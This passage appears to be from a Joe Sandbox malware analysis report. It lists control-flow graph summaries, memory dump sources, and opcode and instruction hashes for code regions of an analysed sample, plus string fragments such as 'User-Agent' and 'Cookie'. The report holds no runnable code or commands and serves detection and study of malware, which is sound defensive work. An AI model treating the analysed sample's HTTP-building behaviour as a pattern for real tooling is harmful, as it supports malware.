• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 374154B6900208BFEF125F65CC44BDEBBBAEF84704F154069EA44AA354DB34DA40CB94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 0 2ef093e-2ef095f call 2ef0cc4 call 2ef14bc call 2ef3cc0 8 2ef0967-2ef0989 0->8 10 2ef098f-2ef09d2 call 2ef09d9 8->10 11 2ef0af1-2ef0af2 8->11 15 2ef0a3d-2ef0a76 10->15 16 2ef09d4-2ef09d5 10->16 17 2ef0a7e-2ef0a80 15->17 18 2ef0a3c 16->18 19 2ef09d7-2ef09e8 call 2ef3653 16->19 21 2ef0aec call 2ef0af3 17->21 22 2ef0a82-2ef0aae 17->22 18->15 19->21 30 2ef09ee-2ef0a10 19->30 21->11 22->21 27 2ef0ab0-2ef0abc 22->27 31 2ef0ac1-2ef0ae5 27->31 30->21 34 2ef0a16-2ef0a3b 30->34 31->11 37 2ef0ae7-2ef0aea 31->37 34->21 38 2ef0a41-2ef0a76 34->38 37->21 37->31 38->17
Memory Dump Source
• Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 1d9df5712705a71680ada817e241050509a19bcfee6f2e5caed69e1bfb53d6a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: C5518F316843549FEF239F20CC85B9A77B8AF04744F0441D9BB49FE0DADBB09694CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 39 2ef14bc-2ef1590 call 2ef14de call 2ef0c9c call 2ef1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction ID: ae3e51a2ef55aba47c9c7425bbb94c82f410adc5aeac748bf26aaa8b48717d85
                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E210C724056189EDF43AF60C9C8CA677ECEF40704F45496AAE89EF049FA709154CEE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 58 2ef1345-2ef1352 59 2ef13eb-2ef13ec 58->59 60 2ef1358-2ef135e 58->60 60->59 61 2ef1364-2ef137a 60->61 61->59 63 2ef137c-2ef138f 61->63 65 2ef1391-2ef1398 63->65 66 2ef139b-2ef13ab call 2ef0e7c 65->66 69 2ef13ad-2ef13e2 66->69 69->59
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: c75914c5c2fd9a2c44e98bdb05f571555b8022ac69bf8e5de8e3bd9a3117d5da
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3821903194521AAFDF119F78C844B5DBBB6AF04704F058215FE59BF594D770E810CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 70 2ef14de-2ef1590 call 2ef3653 call 2ef0c9c call 2ef1345 * 6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction ID: 9e32195c35fe4c013d06d0638b18f7a21d6aa4cb0cad3ff2d4457ad4206b72bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: A511BF72404518DEEF43AF60C5C8CAA73ECEE40704B46496AAE89EF44DFE709154CEE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 88 2ef3f0d-2ef3f29 call 2ef3653 call 2ef379f 93 2ef3f3b-2ef3f66 call 2ef3f78 * 3 88->93 94 2ef3f2b-2ef3f39 call 2ef401b 88->94 107 2ef3f71 93->107 101 2ef3f76-2ef3f77 94->101 107->101 108 2ef3f71 call 2ef3f78 107->108 108->101
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction ID: ccb448bd2594e9e12a0343683f9118e1193352485196ecc0ca4d878d133993e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF08C725E82C0AAEFC03BB18C496893BB9AF40305F45A1D0BB89AD0D0DE3085508E71
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 134 2ef4675-2ef468d call 2ef3a1c 137 2ef468f-2ef4698 call 2ef3a6e 134->137 138 2ef469d-2ef46cd 134->138 137->138 141 2ef47e7-2ef47ec 138->141 142 2ef46d3-2ef46f5 138->142 142->141 144 2ef46fb-2ef4720 142->144 146 2ef4738-2ef475a 144->146 147 2ef4722-2ef4737 144->147 149 2ef47bf-2ef47c9 146->149 150 2ef475c-2ef477e 146->150 147->146 151 2ef47cb-2ef47dd call 2ef3673 149->151 152 2ef47e0-2ef47e5 149->152 150->149 156 2ef4780-2ef47a2 150->156 151->152 152->141 156->149 158 2ef47a4-2ef47bc 156->158 158->149
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction ID: c6ae4e56d6bc73a9a13ce18e2e9494dee9705f05c8863bb2dd1f0e6e4e8b064b
                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C4154B6500208BFEF125F65CC48BDEBFBAEF84708F154499EA44AA294D734D650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 109 2ef4674-2ef4680 110 2ef468b-2ef468d 109->110 111 2ef4686 call 2ef3a1c 109->111 112 2ef468f-2ef4698 call 2ef3a6e 110->112 113 2ef469d-2ef46cd 110->113 111->110 112->113 116 2ef47e7-2ef47ec 113->116 117 2ef46d3-2ef46f5 113->117 117->116 119 2ef46fb-2ef4720 117->119 121 2ef4738-2ef475a 119->121 122 2ef4722-2ef4737 119->122 124 2ef47bf-2ef47c9 121->124 125 2ef475c-2ef477e 121->125 122->121 126 2ef47cb-2ef47dd call 2ef3673 124->126 127 2ef47e0-2ef47e5 124->127 125->124 131 2ef4780-2ef47a2 125->131 126->127 127->116 131->124 133 2ef47a4-2ef47bc 131->133 133->124
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000027.00000002.2995166100.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_39_2_2ef0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction ID: 7853e65dd1f9f879bf6119bdddfb8ff56e039a5b374ebad6ae5f297f1ba5e279
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 044153B6500208BFEF129F65CC44BEEBBBAEF84708F154499EA44AA294D7349650CF94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 147093e-147095f call 1470cc4 call 14714bc call 1473cc0 8 1470967-1470989 0->8 10 1470af1-1470af2 8->10 11 147098f-14709d2 call 14709d9 8->11 15 14709d4-14709d5 11->15 16 1470a3d-1470a80 11->16 17 14709d7-14709e8 call 1473653 15->17 18 1470a3c 15->18 21 1470a82-1470aae 16->21 22 1470aec call 1470af3 16->22 17->22 29 14709ee-1470a10 17->29 18->16 21->22 27 1470ab0-1470abc 21->27 22->10 32 1470ac1-1470ae5 27->32 29->22 33 1470a16-1470a3b 29->33 32->10 37 1470ae7-1470aea 32->37 33->18 33->22 37->22 37->32
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: d6f2f34b1b464a1e44f1c6b89cf103f10c01a9b556875d49a7bd2d19f9a17ebc
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: 3951D2311442549FEF236F20CC85B9A7BB8AF15740F04019ABB49FE0E6DAB09580CA65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 38 14714bc-1471590 call 14714de call 1470c9c call 1471345 * 6
Memory Dump Source
• Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 57 1471345-1471352 58 14713eb-14713ec 57->58 59 1471358-147135e 57->59 59->58 60 1471364-147137a 59->60 60->58 62 147137c-147138f 60->62 64 1471391-1471398 62->64 65 147139b-14713ab call 1470e7c 64->65 68 14713ad-14713e2 65->68 68->58
Memory Dump Source
• Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 69 14714de-1471590 call 1473653 call 1470c9c call 1471345 * 6
Memory Dump Source
• Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 87 1473f0d-1473f29 call 1473653 call 147379f 92 1473f3b-1473f66 call 1473f78 * 3 87->92 93 1473f2b-1473f39 call 147401b 87->93 106 1473f71 92->106 100 1473f76-1473f77 93->100 106->100 107 1473f71 call 1473f78 106->107 107->100
Memory Dump Source
• Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 133 1474675-147468d call 1473a1c 136 147468f-1474698 call 1473a6e 133->136 137 147469d-14746cd 133->137 136->137 140 14747e7-14747ec 137->140 141 14746d3-14746f5 137->141 141->140 143 14746fb-1474720 141->143 145 1474722-1474737 143->145 146 1474738-147475a 143->146 145->146 148 14747bf-14747c9 146->148 149 147475c-147477e 146->149 150 14747e0-14747e5 148->150 151 14747cb-14747dd call 1473673 148->151 149->148 155 1474780-14747a2 149->155 150->140 151->150 155->148 157 14747a4-14747bc 155->157 157->148
Strings
Memory Dump Source
• Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 108 1474674-1474680 109 147468b-147468d 108->109 110 1474686 call 1473a1c 108->110 111 147468f-1474698 call 1473a6e 109->111 112 147469d-14746cd 109->112 110->109 111->112 115 14747e7-14747ec 112->115 116 14746d3-14746f5 112->116 116->115 118 14746fb-1474720 116->118 120 1474722-1474737 118->120 121 1474738-147475a 118->121 120->121 123 14747bf-14747c9 121->123 124 147475c-147477e 121->124 125 14747e0-14747e5 123->125 126 14747cb-14747dd call 1473673 123->126 124->123 130 1474780-14747a2 124->130 125->115 126->125 130->123 132 14747a4-14747bc 130->132 132->123
Strings
Memory Dump Source
• Source File: 00000028.00000002.2991946054.0000000001470000.00000040.00000001.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_1470000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 0 116093e-116095f call 1160cc4 call 11614bc call 1163cc0 8 1160967-1160989 0->8 10 1160af1-1160af2 8->10 11 116098f-11609d2 call 11609d9 8->11 15 11609d4-11609d5 11->15 16 1160a3d-1160a80 11->16 17 11609d7-11609e8 call 1163653 15->17 18 1160a3c 15->18 21 1160a82-1160aae 16->21 22 1160aec call 1160af3 16->22 17->22 29 11609ee-1160a10 17->29 18->16 21->22 27 1160ab0-1160abc 21->27 22->10 31 1160ac1-1160ae5 27->31 29->22 33 1160a16-1160a3b 29->33 31->10 37 1160ae7-1160aea 31->37 33->18 33->22 37->22 37->31
Memory Dump Source
• Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 38 11614bc-11614df call 11614de 41 1161502-1161590 call 1161345 * 6 38->41 42 11614e1-1161500 call 1160c9c 38->42 42->41
Memory Dump Source
• Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                          • Opcode ID: d63aec374ba4a82edc09d58ede7f76cfd3e196a7aafa6aaffec7fd3e48ce6db5
                                                                                                                                                                          • Instruction ID: ca9446ac266cb62fba29155b7167ac075d23726b83bdebe6c04dea929bb36878
                                                                                                                                                                          • Opcode Fuzzy Hash: d63aec374ba4a82edc09d58ede7f76cfd3e196a7aafa6aaffec7fd3e48ce6db5
                                                                                                                                                                          • Instruction Fuzzy Hash: 51211072405614AEDB03AF60C9C8CA773ECEF80608F45096A9D85EF049FF719164CBE6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 58 1161345-1161352 59 11613eb-11613ec 58->59 60 1161358-116135e 58->60 60->59 61 1161364-116137a 60->61 61->59 63 116137c-116138f 61->63 65 1161391-1161398 63->65 66 116139b-11613ab call 1160e7c 65->66 69 11613ad-11613e2 66->69 69->59
Memory Dump Source
• Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: f1dfe0a571fb963acbe03fcb2643c68d557788c35989c1da7696e4f36fc46b07
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: B2219031A04216AFEB119F78C844B5DBFB9AF44710F058215FE55BF594D770E810CB94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 70 11614de-1161590 call 1163653 call 1160c9c call 1161345 * 6
Memory Dump Source
• Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7949667107aebde7353fdb582656519b60ef247000cbbaa81536c7b33184ae9b
• Instruction ID: 398ac33ed0ded64353b9649ef43a413b9e45298f246b10031eca1a3504f597d3
• Opcode Fuzzy Hash: 7949667107aebde7353fdb582656519b60ef247000cbbaa81536c7b33184ae9b
• Instruction Fuzzy Hash: 3811C172404615AEEF07AF60C5C8CAA73ECEF80608B45096A9D86EF44DFF719164CBE5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 9b24d890cd414d69b3160115f6f0181cdad2c7c5668fe810d00f953b9b53af3e
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: CFF082305A8241A6FF053BB09C4966936BCBF20309F0404D0AADDED0D0CF3145708E73
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 110 1164674-116468d call 1163a1c 113 116468f-1164698 call 1163a6e 110->113 114 116469d-11646cd 110->114 113->114 117 11647e7-11647ec 114->117 118 11646d3-11646f5 114->118 118->117 120 11646fb-1164720 118->120 122 1164722-1164737 120->122 123 1164738-116475a 120->123 122->123 125 11647bf-11647c9 123->125 126 116475c-116477e 123->126 127 11647e0-11647e5 125->127 128 11647cb-11647dd call 1163673 125->128 126->125 132 1164780-11647a2 126->132 127->117 128->127 132->125 134 11647a4-11647bc 132->134 134->125
Strings
Memory Dump Source
• Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: f8767cc80695f5b720c7adde5b32d973e735ff1c2862213ccf25447673b78a86
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 5D4161B6500608BFEF129F65CC44BEEBFBAFF80704F154069EA44AA254D7359650CB94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 135 1164675-1164680 136 116468b-116468d 135->136 137 1164686 call 1163a1c 135->137 138 116468f-1164698 call 1163a6e 136->138 139 116469d-11646cd 136->139 137->136 138->139 142 11647e7-11647ec 139->142 143 11646d3-11646f5 139->143 143->142 145 11646fb-1164720 143->145 147 1164722-1164737 145->147 148 1164738-116475a 145->148 147->148 150 11647bf-11647c9 148->150 151 116475c-116477e 148->151 152 11647e0-11647e5 150->152 153 11647cb-11647dd call 1163673 150->153 151->150 157 1164780-11647a2 151->157 152->142 153->152 157->150 159 11647a4-11647bc 157->159 159->150
Strings
Memory Dump Source
• Source File: 00000029.00000002.2991247342.0000000001160000.00000040.00000001.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1160000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 3e0deb0b5cdcc50c56aa97a06d9b689e6a5e566687e8a34d7fa1b46ac4335fc7
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 464161B6500608BFEF125F69CC48BDEBFBEFF80704F154069EA44AA254D7359650CB94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 0 1ff093e-1ff095f call 1ff0cc4 call 1ff14bc call 1ff3cc0 8 1ff0967-1ff0989 0->8 10 1ff098f-1ff09d2 call 1ff09d9 8->10 11 1ff0af1-1ff0af2 8->11 15 1ff0a3d-1ff0a76 10->15 16 1ff09d4-1ff09d5 10->16 17 1ff0a7e-1ff0a80 15->17 18 1ff0a3c 16->18 19 1ff09d7-1ff09e8 call 1ff3653 16->19 20 1ff0aec call 1ff0af3 17->20 21 1ff0a82-1ff0aae 17->21 18->15 19->20 30 1ff09ee-1ff0a10 19->30 20->11 21->20 27 1ff0ab0-1ff0abc 21->27 31 1ff0ac1-1ff0ae5 27->31 30->20 34 1ff0a16-1ff0a3b 30->34 31->11 37 1ff0ae7-1ff0aea 31->37 34->20 38 1ff0a41-1ff0a76 34->38 37->20 37->31 38->17
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 9f787b4a114e438c773e5ce175d4dfee72dae3f8a7ffc12038e15b4265060d00
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 2151C2315442549FEB23AF20CC84B993BB8AF04740F040199FB45FE0E6DBB09594CA65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 39 1ff14bc-1ff1590 call 1ff14de call 1ff0c9c call 1ff1345 * 6
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction ID: bfe9d7f7eabf516cf5551531c1b906e8d1652d8a65ab349f18de1351930c51d2
• Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction Fuzzy Hash: 0C211D724086149EDB03AF60C9C8DA777ECEF40604F45096E9E89EF059FEB19154CEE6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 58 1ff1345-1ff1352 59 1ff13eb-1ff13ec 58->59 60 1ff1358-1ff135e 58->60 60->59 61 1ff1364-1ff137a 60->61 61->59 63 1ff137c-1ff138f 61->63 65 1ff1391-1ff1398 63->65 66 1ff139b-1ff13ab call 1ff0e7c 65->66 69 1ff13ad-1ff13e2 66->69 69->59
Memory Dump Source
• Source File: 0000002A.00000002.2999511262.0000000001FF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 01FF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_1ff0000_KIdSIJzxFEgRWLYApSEFvZXik.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 9d872465cbf70f97b32a6c3bd469c70dafc5238e27be7853a9c15bcc31a4da9f
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
